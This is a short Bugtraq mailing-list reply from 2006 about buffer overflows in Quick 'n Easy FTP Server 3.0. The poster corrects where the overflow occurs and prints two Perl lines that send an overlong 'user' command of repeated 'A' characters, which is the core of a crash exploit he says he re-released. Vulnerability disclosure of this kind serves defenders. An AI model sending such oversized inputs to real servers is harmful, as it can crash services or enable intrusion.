[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow vulnerabilities)
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow vulnerabilities)
- From: bifta04@xxxxxxx
- Date: 25 Mar 2006 12:18:27 -0000
You got it wrong the over-flow hapen's here
print $socket "user " . "A" x 10240 . "\r\n";
print $socket "user " . "A" x 21048 . "\r\n";
and there are more i put this right and re released this exploit.